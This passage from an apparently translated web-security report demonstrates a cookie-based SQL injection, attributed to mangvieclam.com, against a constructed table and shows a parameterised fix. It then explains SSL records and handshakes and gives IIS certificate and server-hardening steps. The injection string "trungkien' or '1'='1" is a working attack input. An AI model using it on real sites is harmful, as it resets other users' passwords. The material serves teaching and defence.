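The two weaknesses described above (identity read from a cookie the client can rewrite, and SQL assembled by string concatenation) and the suggested fix, shown as an added example that is not mangvieclam.com's code: the handlers below run against a constructed in-memory copy of a tblUserInfo table, and the hardened version takes the user name from the server-side session and binds every value as a parameter.

```python
import hashlib
import sqlite3

# Added example, not the page's or mangvieclam.com's code. It reproduces the two weaknesses the
# page describes (identity taken from a rewritable cookie, SQL built by string concatenation)
# against a constructed in-memory copy of the tblUserInfo table, then shows the hardened handler.


def md5_hex(password: str) -> str:
    # The page's application stores md5(password); kept only so the queries match the page.
    return hashlib.md5(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample table with two active users (Active = 1982, as on the page)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tblUserInfo (UserID TEXT, Passwords TEXT, Active INTEGER)")
    for uid, pw in (("trungkien", "secret1"), ("alice", "secret2")):
        con.execute("INSERT INTO tblUserInfo VALUES (?, ?, ?)", (uid, md5_hex(pw), 1982))
    return con


def change_password_vulnerable(con, cookie_username: str, old_pw: str, new_pw: str) -> bool:
    """Mirrors the logic the page attributes to detail.asp: the user name comes straight from
    Request.Cookies("UserName") and is pasted into the SQL text."""
    check = ("Select Count(UserID) From tblUserInfo Where UserID = '" + cookie_username
             + "' And Passwords='" + md5_hex(old_pw) + "' And Active = 1982")
    if con.execute(check).fetchone()[0] == 0:
        return False
    update = ("Update tblUserInfo Set Passwords = '" + md5_hex(new_pw)
              + "' Where UserID = '" + cookie_username + "' And Active = 1982")
    con.execute(update)
    return True


def change_password_hardened(con, session_username: str, old_pw: str, new_pw: str) -> bool:
    """The fix the page suggests, plus parameter binding: identity comes from the server-side
    Session("UserName"), and every value travels as a bound parameter, never as SQL text."""
    row = con.execute(
        "SELECT Count(UserID) FROM tblUserInfo WHERE UserID = ? AND Passwords = ? AND Active = 1982",
        (session_username, md5_hex(old_pw)),
    ).fetchone()
    if row[0] == 0:
        return False
    con.execute("UPDATE tblUserInfo SET Passwords = ? WHERE UserID = ? AND Active = 1982",
                (md5_hex(new_pw), session_username))
    return True


def stored_password(con, uid: str) -> str:
    return con.execute("SELECT Passwords FROM tblUserInfo WHERE UserID = ?", (uid,)).fetchone()[0]


def demo() -> dict:
    """Runs the cookie value quoted on the page against both handlers with a wrong old password,
    and a legitimate password change through the hardened handler."""
    tampered = "trungkien' or '1'='1"
    vuln = make_db()
    vuln_accepted = change_password_vulnerable(vuln, tampered, "not-the-password", "hacked")
    hard = make_db()
    hard_accepted = change_password_hardened(hard, tampered, "not-the-password", "hacked")
    legit = make_db()
    legit_accepted = change_password_hardened(legit, "trungkien", "secret1", "renewed")
    return {
        "vulnerable_accepted": vuln_accepted,
        "vulnerable_trungkien_changed": stored_password(vuln, "trungkien") == md5_hex("hacked"),
        "vulnerable_alice_changed": stored_password(vuln, "alice") == md5_hex("hacked"),
        "hardened_accepted": hard_accepted,
        "hardened_trungkien_changed": stored_password(hard, "trungkien") == md5_hex("hacked"),
        "legit_accepted": legit_accepted,
        "legit_trungkien_changed": stored_password(legit, "trungkien") == md5_hex("renewed"),
    }
```

Because AND binds tighter than OR, the injected UPDATE's WHERE clause reads UserID = 'trungkien' OR ('1'='1' AND Active = 1982), so the vulnerable handler rewrites the password of every active account, not only trungkien's; the hardened handler rejects the tampered name outright because it matches no user.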

4. DDoS: not yet studied

III. Some ways to secure a website

1. SSL (Secure Socket Layer)

1.1 Introduction to SSL

As we know, there are two important security protocols at the transport layer that are of the highest importance for the security of web applications: the SSL and TLS protocols.

In general, there are several possibilities for cryptographically protecting HTTP data traffic. For example, in the 1990s the CommerceNet consortium proposed S-HTTP, which is essentially a security enhancement of HTTP. A partial implementation of S-HTTP was made publicly available in a modified version of the NCSA Mosaic browser that users had to buy (in contrast to the "standard" NCSA Mosaic browser, which was publicly and freely available on the Internet).

However, at the same time Netscape Communications introduced SSL and a corresponding protocol with the first version of Netscape Navigator. Unlike the CommerceNet consortium, Netscape Communications did not charge its customers for the implementation of its security protocol. As a result, SSL became the dominant protocol providing security services for HTTP data traffic in 1994, and S-HTTP quietly disappeared.

1.2 Structure of the SSL protocol:

The structure of SSL and the corresponding SSL protocol are illustrated in figure 1.1 (SSL structure and the SSL protocol). According to this figure, SSL is an intermediate (security) layer between the transport layer and the application layer. SSL is layered on top of a connection-oriented and reliable transport service, such as the one provided by TCP. In principle, it can provide security services for arbitrary application protocols that rely on TCP, not just HTTP. In fact, a major advantage of transport-layer security protocols in general, and of the SSL protocol in particular, is that they are application-independent in the sense that they can be used to transparently protect any application protocol layered on top of TCP. Figure 1.1 illustrates some typical application protocols, including NSIIOP, HTTP, FTP, Telnet, IMAP, IRC, and POP3. All of them can be protected by layering them on top of SSL (the letter S is added to the corresponding protocol acronyms to indicate the use of SSL). Note, however, that SSL has a strong client-server orientation and does not really meet the requirements of peer-to-peer application protocols.

Structure of SSL and the SSL protocol

In summary, the SSL protocol provides communication security with three basic properties:

1. The communicating parties (i.e. client and server) can authenticate each other using public key cryptography.

2. The confidentiality of the data traffic is protected, because the connection is transparently encrypted after an initial handshake and session key negotiation have taken place.

3. The authenticity and integrity of the data traffic are also protected, because messages are transparently authenticated and integrity-checked using a MAC.

However, it is important to note that SSL does not prevent traffic analysis attacks. For example, by examining the unencrypted source and destination IP addresses and TCP port numbers, or by examining the amount of data transferred, a traffic analyst can still determine which parties are interacting, which types of services are being used, and sometimes even obtain information about business or personal relationships. Furthermore, SSL does not prevent attacks directed at the TCP implementation, such as TCP SYN flooding attacks or session hijacking.

To use the protection of SSL, both client and server must know that the other side is using SSL. In general, there are three ways to address this problem:

1. Use dedicated port numbers reserved by the Internet Assigned Numbers Authority (IANA). In this case, a separate port number must be assigned to every application protocol that uses SSL.

2. Use the standard port number of each application protocol and negotiate the security options as part of that application protocol.

3. Use a TCP option to negotiate the use of a security protocol, such as SSL, during the normal TCP connection establishment phase.

Application-specific negotiation of security options (i.e. the second possibility) has the disadvantage of requiring every application protocol to be modified to understand the negotiation process. In addition, defining a TCP option (i.e. the third possibility) is a good solution, but it has not been seriously discussed so far. In practice, separate port numbers have been reserved and assigned by IANA for every application protocol that can run on top of SSL or TLS (i.e. the first possibility). Note, however, that using separate port numbers also has the disadvantage of requiring two TCP connections if the client does not know what the server supports. First, the client must connect to the secure port and then to the insecure port, or vice versa. It is quite possible that future protocols will abandon this approach and look for the second possibility. For example, SASL (Simple Authentication and Security Layer) defines a method for adding authentication support to connection-based application protocols. According to the SASL specification, the use of authentication mechanisms can be negotiated between the client and the server of a given application protocol.

The port numbers assigned by IANA for application protocols that run on top of SSL/TLS are summarized in table 1.2 and partially illustrated in figure 1.1. Today, an "S" indicating the use of SSL is consistently appended (as a suffix) to the acronyms of the corresponding application protocols (in some earlier terminology, S was used and prepended inconsistently to some acronyms).


1.3 SSL Record Protocol:

The SSL Record Protocol receives data from the higher-layer SSL sub-protocols and handles the fragmentation, compression, authentication and encryption of the data. More precisely, this protocol takes a data block of arbitrary size as input and produces a series of SSL data fragments (also called records) as output, each smaller than or equal to 16,383 bytes.

Steps of the SSL Record Protocol.

The different steps of the SSL Record Protocol, which go from a raw data fragment to an SSLPlaintext record (fragmentation step), an SSLCompressed record (compression step) and an SSLCiphertext record (encryption step), are illustrated in figure 1.5. In the end, each SSL record contains the following fields:

- Content type;
- Protocol version number;
- Length;
- Data payload (optionally compressed and encrypted);
- MAC.

The content type defines the higher-layer protocol that must be used to subsequently process the SSL record data payload (after decompression and decryption where appropriate).

The protocol version number defines the SSL version in use (usually version 3.0). Each SSL record data payload is compressed and encrypted according to the current compression method and cipher spec defined for the SSL session.

At the start of every SSL session, the compression method and cipher spec are usually defined as null. Both are established during the initial execution of the SSL Handshake Protocol. Finally, a MAC is appended to every SSL record. It provides message origin authentication and data integrity services. Similar to the encryption algorithm, the algorithm used to compute and verify the MAC is defined in the cipher spec of the current session state. By default, the SSL Record Protocol uses a MAC construction that is similar to, but still different from, the HMAC construction. There are three main differences between the SSL MAC construction and the HMAC construction:

- The SSL MAC construction includes a sequence number in the message before hashing, to prevent specific forms of replay attacks.
- The SSL MAC construction includes the record length.
- The SSL MAC construction uses concatenation operators, whereas the HMAC construction uses addition modulo 2 (XOR).

All of these differences exist mainly because the SSL MAC construction predates the HMAC construction in almost all Internet security protocol specifications. The HMAC construction has also been used for the more recent TLS protocol specification.
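The record fields listed above and the SSL MAC construction, as an added example that is not from the page or from any SSL implementation: the SSL 3.0 MAC is built beside a spelled-out HMAC so that the three differences (sequence number, record length, concatenated pads instead of XOR) are visible in code, and a record is framed with the 5-byte header and then parsed and verified under the initial null cipher spec. The MAC secret and the application data are constructed sample values.

```python
import hashlib
import hmac
import struct

# Added example, not from the page or any SSL implementation. The cipher spec is the initial
# null one, so the payload stays in clear and only the MAC is checked.

MAX_FRAGMENT = 16383                      # upper bound the text gives for one record payload
SSL3_VERSION = (3, 0)
CONTENT_TYPES = {20: "change_cipher_spec", 21: "alert", 22: "handshake", 23: "application_data"}
PAD_LEN = {"md5": 48, "sha1": 40}         # SSL 3.0 pad lengths, which depend on the hash
HASH = "sha1"


def ssl3_mac(secret: bytes, seq_num: int, content_type: int, fragment: bytes) -> bytes:
    """hash(secret + pad_2 + hash(secret + pad_1 + seq_num + type + length + fragment)).
    Everything is concatenated; the 64-bit sequence number and the 16-bit length are hashed in."""
    pad1 = b"\x36" * PAD_LEN[HASH]
    pad2 = b"\x5c" * PAD_LEN[HASH]
    header = struct.pack(">QBH", seq_num, content_type, len(fragment))
    inner = hashlib.new(HASH, secret + pad1 + header + fragment).digest()
    return hashlib.new(HASH, secret + pad2 + inner).digest()


def hmac_spelled_out(key: bytes, msg: bytes) -> bytes:
    """RFC 2104 HMAC: the key is XORed (addition modulo 2) with ipad/opad rather than
    concatenated with a pad, and the construction itself adds no sequence number or length."""
    block = 64
    if len(key) > block:
        key = hashlib.new(HASH, key).digest()
    key = key.ljust(block, b"\x00")
    ipad = bytes(k ^ 0x36 for k in key)
    opad = bytes(k ^ 0x5c for k in key)
    inner = hashlib.new(HASH, ipad + msg).digest()
    return hashlib.new(HASH, opad + inner).digest()


def hmac_matches_stdlib(key: bytes, msg: bytes) -> bool:
    """Cross-check of the spelled-out HMAC against Python's hmac module."""
    return hmac.compare_digest(hmac_spelled_out(key, msg), hmac.new(key, msg, HASH).digest())


def build_record(content_type: int, fragment: bytes, secret: bytes, seq_num: int) -> bytes:
    """5-byte header (type, version 3.0, length) followed by the fragment and its MAC."""
    if content_type not in CONTENT_TYPES:
        raise ValueError("unknown content type")
    if len(fragment) > MAX_FRAGMENT:
        raise ValueError("fragment too large; the record layer must split it first")
    body = fragment + ssl3_mac(secret, seq_num, content_type, fragment)
    return struct.pack(">BBBH", content_type, *SSL3_VERSION, len(body)) + body


def parse_record(data: bytes, secret: bytes, seq_num: int) -> tuple:
    """Validates header, version, length and MAC; returns (content_type, fragment) or raises.
    The receiver's own sequence counter goes into the MAC, so a replayed record fails the check."""
    if len(data) < 5:
        raise ValueError("truncated header")
    content_type, major, minor, length = struct.unpack(">BBBH", data[:5])
    if (major, minor) != SSL3_VERSION:
        raise ValueError("unexpected protocol version")
    if content_type not in CONTENT_TYPES:
        raise ValueError("unknown content type")
    body = data[5:5 + length]
    mac_len = hashlib.new(HASH).digest_size
    if len(body) != length or length < mac_len:
        raise ValueError("bad length")
    fragment, mac = body[:-mac_len], body[-mac_len:]
    if not hmac.compare_digest(mac, ssl3_mac(secret, seq_num, content_type, fragment)):
        raise ValueError("MAC mismatch")
    return content_type, fragment
```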

As illustrated in figure 1.5, several SSL sub-protocols are layered on top of the SSL Record Protocol. Each sub-protocol may refer to specific message types that are sent using the SSL Record Protocol. The SSL 3.0 specification defines the following three SSL protocols:

- Alert Protocol;
- Handshake Protocol;
- ChangeCipherSpec Protocol.

In short, the SSL Alert Protocol is used to transmit alerts through the SSL Record Protocol. Each alert consists of two parts, an alert level and an alert description.

The SSL Handshake Protocol is the main SSL sub-protocol, used to support client and server authentication and to exchange a session key. The SSL Handshake Protocol is therefore overviewed and discussed in the next section.

Finally, the SSL ChangeCipherSpec Protocol is used to change from one cipher spec to another. Although the cipher spec is usually changed at the end of an SSL handshake, it can also be changed at any time after that.

Besides these SSL sub-protocols, an SSL Application Data Protocol is used to pass application data directly to the SSL Record Protocol.

SSL Handshake Protocol:

The SSL Handshake Protocol is the main SSL sub-protocol layered on top of the SSL Record Protocol. Consequently, SSL handshake messages are supplied to the SSL record layer, where they are encapsulated in one or more SSL records that are processed and transmitted as specified by the compression method and cipher spec of the current SSL session and the cryptographic keys of the corresponding SSL connection. The purpose of the SSL Handshake Protocol is to have a client and a server establish and maintain the state information used to secure their communications. More specifically, the protocol must have the client and server agree on a common SSL protocol version, select the compression method and cipher spec, optionally authenticate each other, and create a master secret from which the various session keys for message authentication and encryption can be derived.

In summary, the execution of the SSL Handshake Protocol between a client C and a server S can be summarized as follows (messages placed in square brackets are optional):

1: C -> S: CLIENTHELLO

2: S -> C: SERVERHELLO
           [CERTIFICATE]
           [SERVERKEYEXCHANGE]
           [CERTIFICATEREQUEST]
           SERVERHELLODONE

3: C -> S: [CERTIFICATE]
           CLIENTKEYEXCHANGE
           [CERTIFICATEVERIFY]
           CHANGECIPHERSPEC
           FINISHED

4: S -> C: CHANGECIPHERSPEC
           FINISHED

When client C wants to connect to server S, it establishes a TCP connection to the HTTPS port (which is not included in the protocol description) and sends a CLIENTHELLO message to the server in step 1 of the SSL Handshake Protocol execution. The client may also send a CLIENTHELLO message in response to a HELLOREQUEST message, or on its own initiative in order to renegotiate the security parameters of an existing connection. The CLIENTHELLO message includes the following fields:

- The number of the highest SSL version understood by the client (usually 3.0).
- A client-generated random structure consisting of a 32-bit timestamp in standard UNIX format and a 28-byte value generated by a pseudorandom number generator.
- A session identifier that the client wants to use for this connection.
- A list of the cipher suites supported by the client.
- A list of the compression methods supported by the client.

Note that the session identity field should be empty if no SSL session currently exists or if the client wants to generate new security parameters. In either case, a non-empty session identity field identifies an existing SSL session between client and server (i.e. a session with security parameters that the client wants to reuse). The session identifier may originate from an earlier connection, from this connection, or from another currently active connection. Also note that the list of supported cipher suites, passed from client to server in the CLIENTHELLO message, contains the combinations of cryptographic algorithms supported by the client in order of preference. Each cipher suite defines a key exchange algorithm and a cipher spec. The server will select a cipher suite or, if no acceptable choice has been presented, return an error message and close the connection accordingly. After sending the CLIENTHELLO message, the client waits for a SERVERHELLO message. Any other message returned by the server, except a HELLOREQUEST message, is treated as an error at this point.

In step 2, the server processes the CLIENTHELLO message and responds with either an error message or a SERVERHELLO message. Similar to the CLIENTHELLO message, the SERVERHELLO message has the following fields:

- A server version number containing the lower of the version suggested by the client in the CLIENTHELLO message and the highest version supported by the server.
- A server-generated random structure, also consisting of a 32-bit timestamp in standard UNIX format and a 28-byte value generated by a pseudorandom number generator.
- A session identifier corresponding to this connection.
- A cipher suite selected by the server from the list of cipher suites supported by the client.
- A compression method selected by the server from the list of compression algorithms supported by the client.

If the session identifier in the CLIENTHELLO message is non-empty, the server looks in its session cache for a match. If a match is found and the server is willing to establish the new connection using the corresponding session state, the server responds with the same value that was supplied by the client. This indicates a resumed session and dictates that both parties must proceed directly to the CHANGECIPHERSPEC and FINISHED messages discussed further below. Otherwise, this field contains a different value that identifies a new session. The server may also return an empty session identifier field to indicate that the session will not be cached and therefore cannot be resumed later. Also note that in the SERVERHELLO message the server selects a cipher suite and a compression method from the lists supplied by the client in the CLIENTHELLO message. The key exchange, authentication, encryption and message authentication algorithms are determined by the cipher suite selected by the server and revealed in the SERVERHELLO message. The cipher suites defined in the SSL protocol are essentially the same as the cipher suites defined for TLS (as summarized in tables 1.4 to 1.7 in the earlier articles).

In addition to the SERVERHELLO message, the server must also send other messages to the client. For example, if the server uses certificate-based authentication, the server sends its site certificate to the client in a corresponding CERTIFICATE message. The certificate must be appropriate for the key exchange algorithm of the selected cipher suite and is usually an X.509v3 certificate. The same message type will be used later for the client's response to the server's CERTIFICATEREQUEST message. In the case of X.509v3 certificates, a certificate may actually refer to an entire chain of certificates, ordered with the sender's certificate first, followed by any CA certificates proceeding sequentially toward a root CA (which will be accepted by the client).


Next, the server may send a SERVERKEYEXCHANGE message to the client if it has no certificate, if it has a certificate that can only be used to verify digital signatures, or if it uses the FORTEZZA token-based key exchange algorithm (KEA). Obviously, this message is not required if the site certificate contains an RSA public key that can be used for encryption. Furthermore, a non-anonymous server can optionally request a personal certificate to authenticate the client. To do so, it sends a CERTIFICATEREQUEST message to the client. This message contains a list of the requested certificate types, sorted in the server's order of preference, as well as a list of distinguished names for acceptable CAs. At the end of step 2, the server sends a SERVERHELLODONE message to the client to indicate the end of the SERVERHELLO and its accompanying messages.

After receiving the SERVERHELLO and its accompanying messages, the client verifies that the server's site certificate (if provided) is valid and checks that the security parameters provided in the SERVERHELLO message are acceptable. If the server requests client authentication, the client sends a CERTIFICATE message containing a personal certificate for the user's public key to the server in step 3. Next, the client sends a CLIENTKEYEXCHANGE message whose form depends on the key exchange algorithm selected by the server:

- If RSA is used for server authentication and key exchange, the client generates a 48-byte premaster secret, encrypts it with the public key found in the site certificate or with the temporary RSA key from the SERVERKEYEXCHANGE message, and sends the result back to the server in the CLIENTKEYEXCHANGE message. The server in turn uses the corresponding private key to decrypt the premaster secret.

- If FORTEZZA tokens are used for key exchange, the client derives a token encryption key (TEK) using KEA. The client's KEA calculation uses the public key from the server certificate together with some private parameters in the client's token. The client sends the public parameters the server needs to generate the TEK as well, using its own private parameters. It generates a premaster secret, wraps it using the TEK, and sends the result together with some initialization vectors to the server as part of the CLIENTKEYEXCHANGE message. The server in turn can decrypt the premaster secret accordingly. This key exchange algorithm is not widely used.

If client authentication is required, the client also sends a CERTIFICATEVERIFY message to the server. This message is used to provide explicit verification of the user's identity based on the personal certificate. It is only sent following a client certificate that has signing capability (all certificates except those containing fixed Diffie-Hellman parameters). Finally, the client completes step 3 by sending a CHANGECIPHERSPEC message and a corresponding FINISHED message to the server. The FINISHED message is always sent immediately after the CHANGECIPHERSPEC message, to verify that the key exchange and authentication processes were successful. In fact, the FINISHED message is the first message protected with the newly negotiated algorithms and session keys. It can only be generated and verified if these keys have been properly installed on both sides. No acknowledgment of the FINISHED message is required; the parties may begin sending encrypted data immediately after sending the FINISHED message. The execution of the SSL Handshake Protocol is completed by also having the server send a CHANGECIPHERSPEC message and a corresponding FINISHED message to the client in step 4.

Once the SSL handshake is complete, a secure connection has been established between client and server. This connection can now be used to send application data, which is encapsulated by the SSL Record Protocol. More precisely, application data can be fragmented, compressed, or encrypted and authenticated according to the SSL Record Protocol and the session and connection state information that has now been established (depending on how the SSL Handshake Protocol was executed).

The SSL Handshake Protocol can be shortened if client and server decide to resume a previously established (and still cached) SSL session or to duplicate an existing SSL session. In this case only three message flows, and six messages in total, are required. The corresponding message flows can be summarized as follows:

1: C -> S: CLIENTHELLO
2: S -> C: SERVERHELLO, CHANGECIPHERSPEC, FINISHED
3: C -> S: CHANGECIPHERSPEC, FINISHED

In step 1, the client sends a CLIENTHELLO message to the server carrying the identifier of the session to be resumed. The server in turn checks its session cache for a matching entry. If a matching entry is found and the server is willing to resume the connection under the specified session state, it returns a SERVERHELLO message with the same session identifier in step 2. At this point, both client and server must send CHANGECIPHERSPEC and FINISHED messages to each other in steps 2 and 3. Once session re-establishment is complete, client and server can begin exchanging application data.

SSL encryption mechanism:

1. The client generates a random Session Key when it accesses the Server.
2. The client asks the Server to send its Certificate (containing the Server's Public Key).
3. The client checks the validity of the Certificate.
4. If the Server's Certificate is valid, the client encrypts the Session Key with the Server's Public Key.
5. The client sends the encrypted Session Key to the Server.
6. The Server decrypts the encrypted Session Key with its Private Key.
7. Information exchanged between server and client is then encrypted and decrypted with the Session Key.
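To make the key-establishment steps above concrete, here is an added example (not code from the original report) that derives the SSL 3.0 master secret from the pre-master secret, verifies the FINISHED messages on both sides, and shows the server-side session cache decision behind the abbreviated handshake. It assumes constructed 32-byte CLIENTHELLO/SERVERHELLO randoms and uses HMAC-SHA256 as a stand-in for the SSL 3.0 FINISHED construction.

```python
import hashlib
import hmac

# Constructed nonces standing in for the 32-byte randoms carried in
# CLIENTHELLO and SERVERHELLO (assumption: the text above does not show them).
CLIENT_RANDOM = bytes(range(32))
SERVER_RANDOM = bytes(range(32, 64))

# Handshake messages exchanged before FINISHED; FINISHED covers this
# transcript, so a tampered handshake also fails verification.
TRANSCRIPT = b"CLIENTHELLO|SERVERHELLO|CERTIFICATE|SERVERHELLODONE|CLIENTKEYEXCHANGE"


def ssl3_master_secret(pre_master, client_random, server_random):
    """SSL 3.0 master secret (RFC 6101, section 6.1), 48 bytes:
    MD5(pms || SHA1('A' || pms || cr || sr)) || MD5(... 'BB' ...) || MD5(... 'CCC' ...)."""
    if len(pre_master) != 48:
        raise ValueError("pre-master secret must be 48 bytes")
    out = b""
    for label in (b"A", b"BB", b"CCC"):
        inner = hashlib.sha1(label + pre_master + client_random + server_random).digest()
        out += hashlib.md5(pre_master + inner).digest()
    return out


def finished_verify_data(master_secret, transcript, sender):
    """Verify-data of a FINISHED message: a MAC over the handshake transcript
    keyed with the master secret. Assumption: HMAC-SHA256 stands in for the
    SSL 3.0 MD5/SHA-1 construction; the role is the same."""
    return hmac.new(master_secret, sender + transcript, hashlib.sha256).digest()


def finish_handshake(client_pms, server_pms, transcript=TRANSCRIPT):
    """Steps 3 and 4 after CLIENTKEYEXCHANGE. client_pms is what the client
    generated; server_pms is what the server recovered by decrypting
    CLIENTKEYEXCHANGE with its private key. Returns
    (server_accepts_client_finished, client_accepts_server_finished, client_master_secret)."""
    client_ms = ssl3_master_secret(client_pms, CLIENT_RANDOM, SERVER_RANDOM)
    server_ms = ssl3_master_secret(server_pms, CLIENT_RANDOM, SERVER_RANDOM)

    # Step 3: client sends CHANGECIPHERSPEC, FINISHED; the server recomputes the
    # verify-data under its own keys (constant-time compare).
    client_fin = finished_verify_data(client_ms, transcript, b"CLNT")
    server_ok = hmac.compare_digest(
        client_fin, finished_verify_data(server_ms, transcript, b"CLNT"))

    # Step 4: server sends CHANGECIPHERSPEC, FINISHED covering the client's FINISHED too.
    transcript = transcript + b"|FINISHED(client)"
    server_fin = finished_verify_data(server_ms, transcript, b"SRVR")
    client_ok = hmac.compare_digest(
        server_fin, finished_verify_data(client_ms, transcript, b"SRVR"))
    return server_ok, client_ok, client_ms


class SessionCache:
    """Server-side session cache consulted on CLIENTHELLO: a hit on the offered
    session id selects the abbreviated three-flow handshake, a miss the full
    four-flow one."""

    def __init__(self):
        self._entries = {}

    def store(self, session_id, master_secret):
        self._entries[session_id] = master_secret

    def choose_handshake(self, offered_session_id):
        if offered_session_id in self._entries:
            return "resumed", 3
        return "full", 4


if __name__ == "__main__":
    pms = bytes([3, 0]) + bytes(46)   # constructed; SSL 3.0 puts the client version first
    print(finish_handshake(pms, pms)[:2])                  # (True, True)
    print(finish_handshake(pms, pms[:-1] + b"\x01")[:2])   # (False, False)
```

A pre-master secret that the server decrypts incorrectly surfaces as a FINISHED failure on both sides, which is why the text calls FINISHED the confirmation that key exchange and authentication succeeded.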

Today, when publishing a web site on the Internet, applying the SSL encryption mechanism requires purchasing an SSL Certificate for the Web Server from a Digital Certificate provider such as VeriSign, CyberTrust or EnTrust.

Preparation:

- A Windows Server 2003 machine
- The Internet Information Services (IIS) service installed
- A web site hosted with any content, reachable at http://www.MSOpenLab.com

1. Create the Certificate Request:

- Log on as Administrator, open Internet Information Services (IIS) Manager, expand Web Sites, right-click Default Web Site and choose Properties.
- In the Default Web Site Properties dialog, go to the Directory Security tab and choose Server Certificate...
- In the Welcome to the Web Server Certificate Wizard dialog, choose Next.
- In the Server Certificate dialog, choose Create a new certificate, then Next.
- In the Delayed or Immediate Request dialog, choose Prepare the request now, but send it later, then Next.

- In the Name and Security Settings dialog, choose Next.
- In the Organization Information dialog, enter the information as shown in the figure below, then Next.

- In the Your Site's Common Name dialog, enter www.msopenlab.com as the Common name, then Next.
- In the Geographical Information dialog, enter the information as shown in the figure below, then Next.
- In the Certificate Request File Name dialog, keep the default path C:\certreq.txt, then Next.

- In the Request File Summary dialog, choose Next, then Finish.
- In the Default Web Site Properties dialog, choose OK and close all windows.

2. Request the SSL Certificate from VeriSign.com:

- Open Windows Explorer and copy the contents of the file C:\certreq.txt.
- Open Internet Explorer, go to http://www.verisign.com and choose Free SSL Trial.
- In the Free SSL Trial Certificate window, fill in all the information (*: required fields), then Continue.

- In the Welcome window, choose Continue.
- In the next window, fill in the Technical Contact section, then Continue.

- Under Select Server Platform, choose Microsoft. Under Select Version, choose IIS 6.0. Paste the contents of certreq.txt into the box labelled Paste Certificate Signing Request (CSR), obtained from your server.

- Under What do you plan to use this SSL Certificate for?, choose Web Server, then Continue.

- In the CSR Information window, enter MSOPENLAB in Challenge Phrase and Re-enter Challenge Phrase. Enter any question in Reminder Question, then Continue.

- In the Order summary & acceptance window, choose Accept.

- Check: the SSL Certificate request has been submitted successfully.

Configure the Trusted Root Certification Authority:

- Log in to the mailbox, check that an e-mail from [email protected] has arrived, and click the link as shown in the figure below.
- On the VeriSign web page, choose VeriSign CA Certificates.

- In the Root CA Certificate window, choose Select All and copy the whole contents.

- Paste the contents into Notepad and save the file as ca.cer.
- Open Internet Explorer, go to Tools, choose Internet Options, switch to the Content tab and choose Certificates.

- In the Certificates dialog, choose Import...

- In the Welcome to the Certificate Import Wizard dialog, choose Next.

- In the File to Import dialog, choose Browse, point to C:\ca.cer, then Next.
- In the Certificate Store dialog, choose Automatically select the certificate store based on the type of certificate, then Next, then Finish.

- Paste the contents into Notepad and save the file as cert.txt.
- Open Internet Information Services (IIS) Manager, right-click Default Web Site and choose Properties.
- In the Default Web Site Properties window, go to the Directory Security tab and choose Server Certificate...

- In the Welcome dialog, choose Next.
- In the Pending Certificate Request dialog, choose Process the pending request and install the certificate, then Next.

- In the Process a Pending Request dialog, choose Browse and point to C:\cert.txt.
- In the SSL Port dialog, keep the default port 443, choose Next twice, then Finish.
- In the Default Web Site Properties dialog, choose View Certificate.

- Verify that the Certificate was issued by VeriSign.

Check the result:

- Open Internet Explorer, browse to https://www.MSOpenLab.com and verify that the site is reached successfully.

2. Tools for surveying web servers and finding their weaknesses

A common protective perimeter for the whole network (layer 1), including the web system.

To deploy this first layer of protection, organizations and businesses can install a unified threat management (UTM) security appliance that combines several security functions, such as:

A firewall, which blocks network-layer attacks and discards probes that scan for security weaknesses in the operating systems of the servers.

An intrusion prevention component (IPS), which stops attacks that exploit weaknesses in web application software, database software, operating systems and so on. In addition, virtual private network (VPN) and gateway-level virus scanning components make the system safer.


- A dedicated firewall for web applications.

After building the common protective perimeter, a dedicated firewall for web applications (layer 2) should be added. This web application firewall inspects and blocks attacks that exploit weaknesses introduced while the website was being developed. Depending on the size of the organization or business, and/or on the value of the information assets on the website, a corresponding level of investment can be made in this web application firewall.

There are three options:

- For websites that consist mostly of static (rarely changing) information, hold no important data and carry out no commercial transactions: a web application firewall software module (such as Check Point's Web Intelligence) can be added to the UTM appliance mentioned above.
- For websites that hold a great deal of data vital to the organization or business and that constantly carry out online transactions, so that high security and availability are required: a dedicated web application firewall appliance should be installed (such as the solution from NetContinuum, a vendor specializing in dedicated web application firewall appliances).
- For websites that provide internal information or an information access portal for an organization or business (Web Portal), letting staff connect from anywhere and work at any time: in addition to the common protective layer provided by the UTM appliance, the organization or business also needs to build a secure access gateway to its information resources (for example using Check Point's Connectra Web Security Gateway).

- For system security in general, a firewall can protect computer systems against intruders through its ability to block remote login sessions.
- It blocks traffic from the outside (the Internet) into the protected network while letting legitimate users freely access the outside network. A firewall can also serve as a tool for monitoring malicious attacks from outside, so as to predict the likelihood of an attack before it happens.

Unified security appliance or network intrusion prevention appliance:

After investing in the two protective layers above, an organization or business can further strengthen information security by adding a unified security appliance or a dedicated network intrusion prevention appliance (IPS) (layer 3). This layer divides the internal network into separate zones and applies separate policies to each zone, in order to block attacks originating inside the network and to stop attacks that may have passed through the firewall into the zone holding the critical servers.

Some methods for protecting the Web Server

Web servers are always targets for hackers looking for valuable information or causing disruption for some purpose. The danger can be anything from denial-of-service attacks, to advertising websites with unwholesome content, to deleting or altering the contents of files, to software containing malicious code. Below are some methods for protecting a Web Server:

- Place the web servers in a DMZ. Configure the firewall to refuse connections to the web server on all ports except port 80 (http), port 443 (https) and the ports of the services actually in use.
- Remove every unnecessary service from the web server, even the FTP file transfer service (keep it only if really needed). Any unnecessary service can be abused to attack the system if it is not well secured.
- Do not allow remote administration of the system, unless it is done with one-time passwords or over an encrypted connection.
- Limit the number of people who have administrative or superuser (root) access.
- Create log files that track user activity and keep these log files in an encrypted environment.
- The log file control system is normally used for any activity. Install macro traps to watch for attacks on the server. Create macros that run continuously, or at least can check the integrity of the passwd file and other system files. When the macros detect a change, they should send an e-mail to the system administrator.

- Remove every unnecessary file from the directory holding executable scripts: /cgi-bin.
- Subscribe to and regularly apply the latest security patches from the vendors.
- If the system must be administered remotely, require a secure mechanism such as secure shell to create an encrypted connection. Do not use telnet, or ftp with the anonymous user (require a username and password for access), from any unauthenticated site. Better still, limit connections to the secured systems and to systems inside the Intranet.
- Run the web server in directories with minimal access and usage rights, so that only the administrator can access the real system.
- Run the FTP server in anonymous mode (if the system needs it) in a directory with minimal access rights, separate from the directory used by the web server.
- Perform all updates from the Intranet. Keep the master copy of the web site on a server inside the Intranet, make changes and updates there, and only then push the updates to the website over an SSL connection. Doing this hourly can avoid the server being unavailable for a long time.
- Scan the web server periodically with tools such as ISS or nmap to look for security holes.
- Install software that detects unauthorized access to the servers; configure it to alert on dangerous actions and to capture their sessions for review. This information can tell you how the network is being attacked, as well as the level of security in your system.

